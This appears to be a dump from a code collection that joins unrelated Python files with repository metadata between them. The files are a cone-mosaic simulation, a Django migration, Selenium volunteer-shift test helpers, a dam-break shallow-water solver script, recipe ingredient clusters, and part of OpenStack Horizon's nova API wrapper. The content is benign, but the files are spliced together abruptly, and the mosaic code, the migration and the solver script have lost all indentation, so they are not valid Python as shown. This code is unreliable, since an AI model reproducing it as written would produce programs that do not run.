yvec = np.linspace(self.y1,self.y2,N)
xx,yy = np.meshgrid(xvec,yvec)
xx = xx.ravel()
yy = yy.ravel()
neighbors = np.arange(len(self.cones_x))
return self.compute_field_helper(xx,yy,neighbors)
def compute_field_helper(self,xx,yy,neighbors):
N_neighbors = len(neighbors)
# build a matrix of coordinates
dx = np.tile(xx,(N_neighbors,1)).T
dy = np.tile(yy,(N_neighbors,1)).T
# get the coordinates of the neighbors
neighbor_x_coords = self.cones_x[neighbors]
neighbor_y_coords = self.cones_y[neighbors]
dx = (dx - neighbor_x_coords).T
dy = (dy - neighbor_y_coords).T
field = np.exp(-(dx**2+dy**2)/(2.0*self.potential_sigma**2))
#field = field + np.sqrt(field)*np.random.randn(*field.shape)
field = np.sum(field,axis=0)
if False:
plt.figure()
self.plot()
plt.plot(xx,yy,'gs')
plt.figure()
self.plot()
plt.plot(dx,dy,'gs')
plt.figure()
plt.plot(field)
plt.show()
# box coords for plotting
x1 = np.min(xx)
x2 = np.max(xx)
y1 = np.min(yy)
y2 = np.max(yy)
if False:
plt.subplot(1,2,1)
plt.plot(x,y,'ro')
self.plot()
plt.plot([x1,x2,x2,x1,x1],[y1,y1,y2,y2,y1],'b-')
plt.subplot(1,2,2)
plt.imshow(np.reshape(field,(self.NY,self.NX)),interpolation='none')
plt.show()
#cfield = np.exp(xx**2+yy**2)*self.central_field_strength
cfield = np.sqrt(xx**2+yy**2)*self.central_field_strength
field = field + cfield
return field,neighbors,xx,yy
def xidx(self,x):
return (x-self.subx1)/self.subdx*self.NX
def yidx(self,y):
return (y-self.suby1)/self.subdy*self.NY
def display_field(self,x,y,f=None,n=None):
if f is None:
f,n = self.compute_field(x,y)
f = np.reshape(f,(self.NY,self.NX))[::-1,::-1]
locality = self.locality
plt.imshow(f,interpolation='none')
#plt.colorbar()
plt.autoscale(False)
x = self.xidx(self.cones_x[n])
y = self.yidx(self.cones_y[n])
plt.plot(x,y,'ks')
def display_full_field(self,N=64):
f,n = r.compute_full_field(N)
f = np.reshape(f,(N,N))
plt.imshow(f,interpolation='none')
plt.colorbar()
def plot(self,zoom=1.0):
plt.plot(self.cones_x,self.cones_y,'k.')
x1 = self.xmid-self.dx/2.0*np.sqrt(2)/zoom
x2 = self.xmid+self.dx/2.0*np.sqrt(2)/zoom
y1 = self.ymid-self.dy/2.0*np.sqrt(2)/zoom
y2 = self.ymid+self.dy/2.0*np.sqrt(2)/zoom
plt.xlim((x1,x2))
plt.ylim((y1,y2))
def f2cdf(self,f):
# convert a field into a CDF such that the
# lowest points in the field have the highest
# chance of being selected
if not np.min(f)==np.max(f):
weights = np.max(f)-f
else:
weights = np.ones(f.shape)
csum = np.cumsum(weights)
cdf = csum/np.max(csum)
# search the weights for a random number
test = np.random.rand()
lower_bound = 0
for idx,p in enumerate(cdf):
if test>=lower_bound and test<=p:
winner = idx
break
lower_bound = p
return winner
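        # NOTE: the linear CDF scan above could equivalently be written as
        # winner = np.searchsorted(cdf, test), at O(log n) instead of O(n).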
def step(self):
self.record()
self.save_mosaic()
self.age = self.age + 1
        idx_vec = list(range(self.N_cones))  # list() so shuffle() can permute in place
shuffle(idx_vec)
oldxs = []
oldys = []
newxs = []
newys = []
contrasts = []
neighbor_counts = []
n_expected = 0.0
for idx in idx_vec:
#print '\t%d'%idx
x,y = self.cones_x[idx],self.cones_y[idx]
f,n,XX,YY = self.compute_field(x,y)
neighbor_counts.append(len(n))
#print f
#f = f + np.sqrt(f)*np.random.randn(len(f))*.1
fmin = np.min(f)
fmax = np.max(f)
contrasts.append((fmax-fmin)/fmax)
if self.use_cdf:
winner = self.f2cdf(f)
else:
winner = np.argmin(f)
oldxs.append(self.cones_x[idx])
oldys.append(self.cones_y[idx])
self.cones_x[idx] = XX[winner]
self.cones_y[idx] = YY[winner]
newxs.append(self.cones_x[idx])
newys.append(self.cones_y[idx])
xoa = np.array(oldxs)
yoa = np.array(oldys)
xna = np.array(newxs)
yna = np.array(newys)
d = np.sqrt((xna-xoa)**2+(yna-yoa)**2)
self.shift_mean = d.mean()
self.shift_std = d.std()
self.shift_max = d.max()
self.shift_min = d.min()
self.N_neighbors = np.mean(neighbor_counts)
        print('Mean shift: %0.6f, N_neighbors: %0.1f' % (self.shift_mean, self.N_neighbors))
G = 10
if self.age%1==0:
plt.clf()
plt.subplot(2,2,1)
plt.cla()
clim = (np.min(self.mosaic),np.max(self.mosaic))
plt.imshow(self.mosaic,cmap='gray',interpolation='none',clim=clim)
plt.colorbar()
plt.subplot(2,2,2)
plt.cla()
self.plot()
for oldx,oldy,newx,newy in zip(oldxs[-G:],oldys[-G:],newxs[-G:],newys[-G:]):
plt.plot([oldx,newx],[oldy,newy],'b-')
plt.plot(newx,newy,'ro')
plt.subplot(2,2,3)
plt.cla()
sy,sx = self.mosaic.shape
my,mx = sy//2,sx//2
plt.imshow(self.mosaic[my-50:my+50,mx-50:mx+50],cmap='gray',interpolation='none',clim=clim)
plt.colorbar()
plt.subplot(2,2,4)
plt.cla()
self.plot(zoom=5.0)
plt.pause(.001)
self.h5.put('/age',self.age)
if __name__=='__main__':
# locality .02 finishes in < 1 min; .01 in 20 minutes; because the resulting granularity
# of .01 leads to far fewer stationary cones each step; locality .02 with granularity .02/16.0
# would be even slower; locality .01 with granularity .0025 would be quite a bit faster
locality = .01
granularity = locality/4.0#originally locality/8.0
# an excellent combination of these parameters is 0.01,5.0,4500
cone_potential_fwhm_vec = [.010]
central_field_strength_vec = [7.5]
use_cdf = False
for cone_potential_fwhm in cone_potential_fwhm_vec:
for central_field_strength in central_field_strength_vec:
#m = Mosaic(x1=-.25,x2=.25,y1=-.25,y2=.25,N_cones=4500,locality=locality,granularity=granularity,central_field_strength=central_field_strength,potential_fwhm_deg=cone_potential_fwhm,use_cdf=use_cdf)
m = Mosaic(x1=-.5,x2=.5,y1=-.5,y2=.5,N_cones=20000,locality=locality,granularity=granularity,central_field_strength=central_field_strength,potential_fwhm_deg=cone_potential_fwhm,use_cdf=use_cdf)
while m.shift_mean>2.5e-4 and m.age<200:
m.step()
| [
"[email protected]"
] | |
17e98671744e907b39b79ee00bceb8d098905ea7 | c0792645c156cb9e20a1aa2b28c565150358bc6e | /apps/inmueble/migrations/0017_auto_20180526_0412.py | 8ddac3048c867751bb7c7635c709ef1ddbd2cc4d | [] | no_license | clioo/Praver | b22fd92886e0399845adb4366663cae6a7d7853b | 523f0d78e0a2039a5bae3e539c93e2c2415a0840 | refs/heads/master | 2020-03-11T12:38:54.272392 | 2018-06-28T18:24:21 | 2018-06-28T18:24:21 | 130,003,043 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 411 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2018-05-26 10:12
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('inmueble', '0016_auto_20180526_0410'),
]
operations = [
migrations.AlterModelOptions(
name='localidades',
options={'managed': False},
),
]
| [
"[email protected]"
] | |
823e85e0dfe556e154f26652a500ed91838d9a13 | 8fa8ded3772dd7a124c1bbb91fc109ed2b63574b | /mycelium/apps/volunteers/tests/selenium_abstractions.py | 5cda3d87e310f4732fb2b14444382ce6e7a8d3c9 | [] | no_license | skoczen/mycelium | 3642b0f5e5ea03d609a3e499c7ad68092101dce0 | da0f169163f4dc93e2dc2b0d934abf4f18c18af0 | refs/heads/master | 2020-04-10T09:21:46.893254 | 2014-05-20T02:27:06 | 2014-05-20T02:27:06 | 2,114,887 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,479 | py | import time
from test_factory import Factory
class VolunteerTestAbstractions(object):
def create_new_volunteer(self):
sel = self.selenium
self.create_john_smith_and_verify()
sel.click("css=.detail_tab[href=#volunteer]")
time.sleep(1)
assert sel.is_text_present("No volunteer shifts yet")
def create_new_volunteer_with_one_shift(self):
sel = self.selenium
self.create_new_volunteer()
sel.click("css=.detail_tab[href=#volunteer]")
time.sleep(1)
assert sel.is_text_present("No volunteer shifts yet")
sel.click("css=tabbed_box[name=add_a_volunteer_shift] tab_title")
sel.type("css=#id_duration", 4)
sel.type("css=#id_date", "2/11/2011")
sel.click("css=tabbed_box[name=add_a_volunteer_shift] .add_shift_btn")
time.sleep(1)
self.assertEqual("4 hours", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .duration"))
self.assertEqual("Feb. 11, 2011", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .date"))
# self.assertEqual("on an unscheduled shift.", sel.get_text("css=.volunteer_shift_table:nth(0) .completed_volunteer_shift_row .shift"))
self.assertEqual("2011", sel.get_text("css=.year_overview:nth(0) .year"))
self.assertEqual("1 shift", sel.get_text("css=.year_overview:nth(0) .total_shifts"))
self.assertEqual("4 hours", sel.get_text("css=.year_overview:nth(0) .total_hours"))
sel.click("link=See details")
self.assertEqual("4 hours", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .duration"))
self.assertEqual("Feb. 11, 2011", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .date"))
# self.assertEqual("on an unscheduled shift.", sel.get_text("css=.year_of_shifts:nth(0) .year_of_volunteer_shifts_table .completed_volunteer_shift_row .shift"))
def add_a_new_shift(self, hours=None, date=None):
sel = self.selenium
if not hours:
hours = Factory.rand_int(1,10)
sel.click("css=tabbed_box[name=add_a_volunteer_shift] tab_title")
sel.type("css=#id_duration", hours)
if date:
sel.type("css=#id_date", date)
sel.click("css=tabbed_box[name=add_a_volunteer_shift] .add_shift_btn")
time.sleep(2) | [
"[email protected]"
] | |
f19711c824d08b2f99bde202875be60d5015bc4a | dfc827bf144be6edf735a8b59b000d8216e4bb00 | /CODE/experimentcode/DryBedPaper/Dambreak/FEVMdryWBuhonly zeroorder/Run.py | 12accac582bfd8b9937706f72632e59e0bb7acdc | [] | no_license | jordanpitt3141/ALL | c5f55e2642d4c18b63b4226ddf7c8ca492c8163c | 3f35c9d8e422e9088fe096a267efda2031ba0123 | refs/heads/master | 2020-07-12T16:26:59.684440 | 2019-05-08T04:12:26 | 2019-05-08T04:12:26 | 94,275,573 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 7,430 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 14:24:26 2017
@author: jp
"""
from Serre2dc import *
from scipy import *
from pylab import plot, show, legend,xlim,ylim,savefig,title,xlabel,ylabel,clf, loglog
import csv
import os
from numpy.linalg import norm,solve
from time import time
def copyarraytoC(a):
n = len(a)
b = mallocPy(n)
for i in range(n):
writetomem(b,i,a[i])
return b
def copyarrayfromC(a,n):
b = [0]*n
for i in range(n):
b[i] = readfrommem(a,i)
return b
def copywritearraytoC(a,b):
n = len(a)
for i in range(n):
writetomem(b,i,a[i])
def makevar(sx,ex,dx,st,et,dt):
x = arange(sx, ex, dx)
t = arange(st, et, dt)
return x,t
def getGfromupy(h,u,bed,u0,u1,h0,h1,b0,b1,dx):
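    # Assemble G pointwise with a second-order central-difference stencil:
    # G[i] = ai*u[i-1] + bi*u[i] + ci*u[i+1], where ai, bi, ci depend on h,
    # its slope, and the bed derivatives; the ghost values (u0,h0,b0) and
    # (u1,h1,b1) close the stencil at the two boundary rows.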
idx = 1.0 / dx
ithree = 1.0 / 3.0
n = len(h)
G = zeros(n)
for i in range(1,n-1):
th = h[i]
thx = 0.5*idx*(h[i+1] - h[i-1])
tbx = 0.5*idx*(bed[i+1] - bed[i-1])
tbxx = idx*idx*(bed[i+1] -2*bed[i] + bed[i-1])
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u[i-1] + bi*u[i] + ci*u[i+1]
#boundary
#i=0
i=0
th = h[i]
thx = 0.5*idx*(h[i+1] - h0)
tbx = 0.5*idx*(bed[i+1] - b0)
tbxx = idx*idx*(bed[i+1] -2*bed[i] + b0)
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u0 + bi*u[i] + ci*u[i+1]
#i = n-1
i = n-1
th = h[i]
thx = 0.5*idx*(h1 - h[i-1])
tbx = 0.5*idx*(b1 - bed[i-1])
tbxx = idx*idx*(b1 -2*bed[i] + bed[i-1])
D = th + th*thx*tbx + 0.5*th*th*tbxx + th*tbx*tbx
ai = -ithree*idx*idx*th*th*th + 0.5*idx*th*th*thx
bi = D + 2.0*ithree*idx*idx*th*th*th
ci = -ithree*idx*idx*th*th*th - 0.5*idx*th*th*thx
G[i] = ai*u[i-1] + bi*u[i] + ci*u1
return G
def Dambreak(h0,h1,x0,x):
n = len(x)
h = zeros(n)
u = zeros(n)
G = zeros(n)
b = zeros(n)
for i in range(n):
if (x[i] < x0):
h[i] = h1
else:
h[i] = h0
return h,u,G,b,h
def DrybedSWWANA(h1,x,t,g):
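    # Analytic dry-bed dam-break (Ritter) solution of the shallow water
    # equations, plus the corresponding G inside the rarefaction fan.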
n = len(x)
u = zeros(n)
h = zeros(n)
G = zeros(n)
for i in range(n):
if(x[i] >= -t*sqrt(g*h1) and x[i] <= 2*t*sqrt(g*h1) ):
u[i] = 2.0 / 3.0 *(sqrt(g*h1) + x[i] / t)
h[i] = 4.0 / (9.0 * g) *(sqrt(g*h1) - 0.5*x[i] / t)**2
ux = 2.0 / 3.0 *(1.0 / t)
uxx = 0
hx = 2.0 / (9.0 * g * t*t) *(x[i] - 2*t*sqrt(g*h1))
G[i] = u[i]*h[i] - h[i]*h[i]*hx*ux
elif(x[i] < -t*sqrt(g*h1)):
h[i] = h1
return h,u, G
#Forcing Problem
wdir = "/home/jp/Documents/PhD/project/data/DryBedPaper/Dambreak/t1/"
if not os.path.exists(wdir):
os.makedirs(wdir)
g = 9.81
h1 = 1.0
h0 = 0.0
x0 = 0
startx = -100
sx = startx
endx = 100
ex = endx
startt = 0.0
st = startt
endt = 10
et = endt
dx = 0.01
l = 0.01
dt = l*dx
t = startt
x = arange(startx,endx +0.1*dx, dx)
xhuMbeg = array([x[0] - 1.5*dx, x[0] - dx, x[0] -0.5*dx])
xhuMend = array([x[-1] + 0.5*dx, x[-1] + dx, x[-1] + 1.5*dx])
xbMbeg = [x[0] - (2 + 0.5)*dx,x[0] - (2 + 1.0/6.0)*dx,x[0] - (2 - 1.0/6.0)*dx,x[0] - (2 - 0.5)*dx,x[0] - (1 + 1.0/6.0)*dx,x[0] - (1 - 1.0/6.0)*dx,x[0] - (1 - 0.5)*dx]
xbMend = [x[-1] + (1 - 0.5)*dx,x[-1] + (1 - 1.0/6.0)*dx,x[-1] + (1 + 1.0/6.0)*dx,x[-1] + (1 + 0.5)*dx,x[-1] + (2 - 1.0/6.0)*dx,x[-1] + (2 + 1.0/6.0)*dx,x[-1] + (2 + 0.5)*dx]
theta = 1.2
h,u,G,b,w = Dambreak(h0,h1,x0,x)
hMbeg,uMbeg,GMbeg,bta,wMbeg = Dambreak(h0,h1,x0,xhuMbeg)
hMend ,uMend ,GMend ,bta,wMend = Dambreak(h0,h1,x0,xhuMend)
hta,uta,Gta,bMbeg,wta = Dambreak(h0,h1,x0,xbMbeg)
hta,uta,Gta,bMend,wta = Dambreak(h0,h1,x0,xbMend)  # was xbMbeg: copy-paste slip; the end-side bed values need the end-side grid
n = len(x)
hnBC = 3
hnbc = 3*n + 2*hnBC
bnMBC = 7
bnBC = 4
bnbc = 3*n + 1 + 2*(bnBC -1)
unBC = 3
unbc = 2*n + 1 + 2*(unBC -1)
niBC = 4
xbegC = arange(sx - niBC*dx,sx,dx)
xendC = arange(ex + dx,ex + (niBC+1)*dx,dx)
b0C = b[0]*ones(niBC)
b1C = b[-1]*ones(niBC)
u0C = u[0]*ones(niBC)
u1C = u[-1]*ones(niBC)
h0C = h[0]*ones(niBC)
h1C = h[-1]*ones(niBC)
G0C = G[0]*ones(niBC)
G1C = G[-1]*ones(niBC)
xbcC = concatenate([xbegC,x,xendC])
bbcC = concatenate([b0C,b,b1C])
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
xbcC_c = copyarraytoC(xbcC)
bbcC_c = copyarraytoC(bbcC)
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
Eni = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pni = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mni = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gni = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(unbc)
hbc_c = mallocPy(hnbc)
wbc_c = mallocPy(hnbc)
Gbc_c = mallocPy(hnbc)
bbc_c = mallocPy(bnbc)
t = 0.0
#Just an FEM solve here
while t < endt:
evolvewrapForcingANA(h_c,G_c,b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,uMbeg_c,uMend_c,n,hnBC,hnbc,bnBC,bnMBC,bnbc,unBC,unbc,theta,dx,dt,g);
t = t + dt
print(t)
hSWWE,uSWWE,GSWWE = DrybedSWWANA(h1,x,t,g)
hC = copyarrayfromC(h_c,n)
GC = copyarrayfromC(G_c,n)
ReconandSolve(h_c,G_c,b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,uMbeg_c,uMend_c,n,hnBC,hnbc,bnBC,bnMBC,bnbc,unBC,unbc,theta,dx,dt,g,Gbc_c,hbc_c,wbc_c,ubc_c,bbc_c)
ubcC = copyarrayfromC(ubc_c,unbc)
uC = ubcC[unBC:-unBC:2]
hbcC = copyarrayfromC(hbc_c,hnbc)
wbcC = copyarrayfromC(wbc_c,hnbc)
GbcC = copyarrayfromC(Gbc_c,hnbc)
bbcC = copyarrayfromC(bbc_c,bnbc)
u0Cn = uC[0]*ones(niBC)
u1Cn = uC[-1]*ones(niBC)
h0Cn = hC[0]*ones(niBC)
h1Cn = hC[-1]*ones(niBC)
G0Cn = GC[0]*ones(niBC)
G1Cn = GC[-1]*ones(niBC)
hbcC = concatenate([h0Cn,hC,h1Cn])
ubcC = concatenate([u0Cn,uC,u1Cn])
GbcC = concatenate([G0Cn,GC,G1Cn])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
Eerr = abs(En- Eni)/ abs(Eni)
Perr = abs(Pn- Pni)
Gerr = abs(Gn- Gni)
Merr = abs(Mn- Mni)/ abs(Mni)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hbc_c)
deallocPy(wbc_c)
deallocPy(Gbc_c)
deallocPy(bbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
| [
"[email protected]"
] | |
3514ec92ed02abcbee5fee7ae8ee2db6b9582ad4 | a087b6fbd9bc4f3ec1d7f48268e733e106369fcd | /food_project/recipe/ingredient.py | 7e888e99153f0a4be95aaba923d7f84a712d1aff | [] | no_license | zhakguder/FoodProject | 8b628583fb2f0ee3537f5340301b78c926401968 | 7ab881d9884d366efffa7a4c84c27c02fbe7a467 | refs/heads/main | 2023-03-05T18:30:16.939582 | 2021-02-14T19:50:04 | 2021-02-14T19:50:04 | 327,974,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,746 | py | #!/usr/bin/env python3
class Ingredient:
def __init__(self, name, id, quantity, entropy):
self.name = name
self.id = id # column number in recipe ingredients dataframe
self.quantity = quantity
self.entropy = entropy
# clusters = {}
ingredients_to_clusters = {} # TODO: put this into mongo
# TODO: separate populating this into an independent task, do it upfront once
# not with every run of the program
class IngredientCluster:
def __init__(self, name, *ingredients):
self.name = name
self.ingredients = ingredients
# self.quantity = 0
# clusters[name] = self
self.save_ingredients() # TODO: functions shouldn't have side-effects!!!
def save_ingredients(self):
# TODO: not written well
for ingredient in self.ingredients:
ingredients_to_clusters[ingredient.name] = self.name
def add_ingredient(self, ingredient):
self.ingredients += (ingredient,)
def get_quantity(self):
# self.quantity = sum([x.quantity for x in self.ingredients])
# return self.quantity
return sum([x.quantity for x in self.ingredients])
def get_entropy(self):
# self.entropy = sum([x.entropy for x in self.ingredients])
# return self.entropy
try:
n_ingredients = len([x for x in self.ingredients if x.entropy != 0])
return sum([x.entropy for x in self.ingredients]) / n_ingredients
        except ZeroDivisionError:  # no ingredients with nonzero entropy
return 0
@staticmethod
def ingredient_in_cluster(ing_name):
# return [
# cluster.name for _, cluster in clusters if ing_name in cluster.ingredients
# ]
return ingredients_to_clusters.get(ing_name, None)
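# Minimal usage sketch (names and values illustrative):
#
#   flour = Ingredient('flour', id=0, quantity=200.0, entropy=0.4)
#   spelt = Ingredient('spelt flour', id=1, quantity=50.0, entropy=0.2)
#   cluster = IngredientCluster('flours', flour, spelt)
#   cluster.get_quantity()                            # 250.0
#   IngredientCluster.ingredient_in_cluster('flour')  # 'flours'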
| [
"[email protected]"
] | |
4051013cb749e4537f1d7905343871778e1be479 | 14ed72a44d78f748d03df772c4449a5620ae2e85 | /openstack_dashboard/api/nova.py | 07688692eb223e3a73f7fa073aea0098e26c1304 | [] | no_license | duihuhu/mydashboard | 91a98b240da320f65a5324c78d099760057eb429 | 670f5f2fc7ceb7f0f2770b2f7f6f1c9173e0a8c6 | refs/heads/master | 2021-01-19T03:02:18.128402 | 2016-07-25T09:06:01 | 2016-07-25T09:06:01 | 64,120,033 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 37,337 | py | # Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
# Copyright 2012 Nebula, Inc.
# Copyright (c) 2012 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import logging
from django.conf import settings
from django.utils.functional import cached_property # noqa
from django.utils.translation import ugettext_lazy as _
import six
from novaclient import client as nova_client
from novaclient import exceptions as nova_exceptions
from novaclient.v2.contrib import instance_action as nova_instance_action
from novaclient.v2.contrib import list_extensions as nova_list_extensions
from novaclient.v2 import security_group_rules as nova_rules
from novaclient.v2 import security_groups as nova_security_groups
from novaclient.v2 import servers as nova_servers
from horizon import conf
from horizon import exceptions as horizon_exceptions
from horizon.utils import functions as utils
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.api import network_base
LOG = logging.getLogger(__name__)
# Supported compute versions
VERSIONS = base.APIVersionManager("compute", preferred_version=2)
VERSIONS.load_supported_version(1.1, {"client": nova_client, "version": 1.1})
VERSIONS.load_supported_version(2, {"client": nova_client, "version": 2})
# API static values
INSTANCE_ACTIVE_STATE = 'ACTIVE'
VOLUME_STATE_AVAILABLE = "available"
DEFAULT_QUOTA_NAME = 'default'
class VNCConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_vnc_console method.
"""
_attrs = ['url', 'type']
class SPICEConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_spice_console method.
"""
_attrs = ['url', 'type']
class RDPConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_rdp_console method.
"""
_attrs = ['url', 'type']
class SerialConsole(base.APIDictWrapper):
"""Wrapper for the "console" dictionary.
Returned by the novaclient.servers.get_serial_console method.
"""
_attrs = ['url', 'type']
class Server(base.APIResourceWrapper):
"""Simple wrapper around novaclient.server.Server.
Preserves the request info so image name can later be retrieved.
"""
_attrs = ['addresses', 'attrs', 'id', 'image', 'links',
'metadata', 'name', 'private_ip', 'public_ip', 'status', 'uuid',
'image_name', 'VirtualInterfaces', 'flavor', 'key_name', 'fault',
'tenant_id', 'user_id', 'created', 'OS-EXT-STS:power_state',
'OS-EXT-STS:task_state', 'OS-EXT-SRV-ATTR:instance_name',
'OS-EXT-SRV-ATTR:host', 'OS-EXT-AZ:availability_zone',
'OS-DCF:diskConfig']
def __init__(self, apiresource, request):
super(Server, self).__init__(apiresource)
self.request = request
# TODO(gabriel): deprecate making a call to Glance as a fallback.
@property
def image_name(self):
import glanceclient.exc as glance_exceptions # noqa
from openstack_dashboard.api import glance # noqa
if not self.image:
return _("-")
if hasattr(self.image, 'name'):
return self.image.name
if 'name' in self.image:
return self.image['name']
else:
try:
image = glance.image_get(self.request, self.image['id'])
return image.name
except (glance_exceptions.ClientException,
horizon_exceptions.ServiceCatalogException):
return _("-")
@property
def internal_name(self):
return getattr(self, 'OS-EXT-SRV-ATTR:instance_name', "")
@property
def availability_zone(self):
return getattr(self, 'OS-EXT-AZ:availability_zone', "")
@property
def host_server(self):
return getattr(self, 'OS-EXT-SRV-ATTR:host', '')
class Hypervisor(base.APIDictWrapper):
"""Simple wrapper around novaclient.hypervisors.Hypervisor."""
_attrs = ['manager', '_loaded', '_info', 'hypervisor_hostname', 'id',
'servers']
@property
def servers(self):
# if hypervisor doesn't have servers, the attribute is not present
servers = []
try:
servers = self._apidict.servers
except Exception:
pass
return servers
class NovaUsage(base.APIResourceWrapper):
"""Simple wrapper around contrib/simple_usage.py."""
_attrs = ['start', 'server_usages', 'stop', 'tenant_id',
'total_local_gb_usage', 'total_memory_mb_usage',
'total_vcpus_usage', 'total_hours']
def get_summary(self):
return {'instances': self.total_active_instances,
'memory_mb': self.memory_mb,
'vcpus': self.vcpus,
'vcpu_hours': self.vcpu_hours,
'local_gb': self.local_gb,
'disk_gb_hours': self.disk_gb_hours,
'memory_mb_hours': self.memory_mb_hours}
@property
def total_active_instances(self):
return sum(1 for s in self.server_usages if s['ended_at'] is None)
@property
def vcpus(self):
return sum(s['vcpus'] for s in self.server_usages
if s['ended_at'] is None)
@property
def vcpu_hours(self):
return getattr(self, "total_vcpus_usage", 0)
@property
def local_gb(self):
return sum(s['local_gb'] for s in self.server_usages
if s['ended_at'] is None)
@property
def memory_mb(self):
return sum(s['memory_mb'] for s in self.server_usages
if s['ended_at'] is None)
@property
def disk_gb_hours(self):
return getattr(self, "total_local_gb_usage", 0)
@property
def memory_mb_hours(self):
return getattr(self, "total_memory_mb_usage", 0)
class SecurityGroup(base.APIResourceWrapper):
"""Wrapper around novaclient.security_groups.SecurityGroup.
Wraps its rules in SecurityGroupRule objects and allows access to them.
"""
_attrs = ['id', 'name', 'description', 'tenant_id']
@cached_property
def rules(self):
"""Wraps transmitted rule info in the novaclient rule class."""
manager = nova_rules.SecurityGroupRuleManager(None)
rule_objs = [nova_rules.SecurityGroupRule(manager, rule)
for rule in self._apiresource.rules]
return [SecurityGroupRule(rule) for rule in rule_objs]
def to_dict(self):
return self._apiresource.to_dict()
@six.python_2_unicode_compatible
class SecurityGroupRule(base.APIResourceWrapper):
"""Wrapper for individual rules in a SecurityGroup."""
_attrs = ['id', 'ip_protocol', 'from_port', 'to_port', 'ip_range', 'group']
def __str__(self):
if 'name' in self.group:
vals = {'from': self.from_port,
'to': self.to_port,
'ip_protocol': self.ip_protocol,
'group': self.group['name']}
return (_('ALLOW %(from)s:%(to)s/%(ip_protocol)s from %(group)s') %
vals)
else:
vals = {'from': self.from_port,
'to': self.to_port,
'ip_protocol': self.ip_protocol,
'cidr': self.ip_range['cidr']}
return (_('ALLOW %(from)s:%(to)s/%(ip_protocol)s from %(cidr)s') %
vals)
# The following attributes are defined to keep compatibility with Neutron
@property
def ethertype(self):
return None
@property
def direction(self):
return 'ingress'
class SecurityGroupManager(network_base.SecurityGroupManager):
backend = 'nova'
def __init__(self, request):
self.request = request
self.client = novaclient(request)
def list(self):
return [SecurityGroup(g) for g
in self.client.security_groups.list()]
